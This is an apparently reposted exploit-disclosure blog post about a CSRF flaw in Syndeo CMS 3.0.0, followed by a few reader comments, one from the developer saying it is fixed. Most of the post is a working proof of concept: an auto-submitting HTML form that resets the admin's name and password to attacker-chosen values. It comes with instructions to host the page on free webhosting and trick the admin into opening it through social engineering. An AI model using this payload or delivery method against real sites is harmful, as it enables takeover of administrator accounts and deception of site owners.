Syndeo CMS Admin Password Change through CSRF

# Exploit Title: Syndeo CMS Admin Password Change through CSRF
# Google Dork: none
# Date: 5/12/2013
# Exploit Author: Aditya Joshi
# Vendor Homepage:
# Software Link:
# Version: 3.0.0
# Tested on: Windows 7
# Status: Fixed

Discription ...
In Syndeo CMS an attacker can easily change admin name, password, email through CSRF vulnerability.
The vulnerability exists in http://localhost/cms/starnet/index.php?option=configuration&save=personal , where admin name , password change text fields are without any token.

Exploiting the BUG ...
Create a html page and paste following html code in it ...


<html><body onload="form1.submit();"><form method="POST" name="form1" action="http://localhost/cms/starnet/index.php?option=configuration&save=personal"><input class="textfield" type="text" value="hacker" size="40" name="fullname" tabindex="1"></input><input class="textfield" type="text" value="" size="40" name="email" tabindex="2"></input><input class="textfield" type="text" value="admin" size="20" name="username" tabindex="3"></input><input class="textfield" type="password" value="hacker" size="20" name="password" tabindex="4"></input></form></body></html>

and upload malicious page to any free webhosting website..
Now send link of mailicous html page through Social Engenerring to the admin of the vulnerable syndeo web app

To Fix this bug kindly visit this link 

Greets ---> Aditya Dixit, Deejay alone , Indian Web King....

Syndeo CMS Admin Password Change through CSRF Syndeo CMS Admin Password Change through CSRF Reviewed by Aditya Joshi on 18:21:00 Rating: 5


  1. I have fixed this exploit , see our forum:

    Kind regards Fred Stuurman
    Main developer SyndeoCMS

    1. there are so many exploits in it

  2. Good wrk bro, in the next update of ur cms i will surely try to find bugs and will report to u


Share your problems but don't spam here

Powered by Blogger.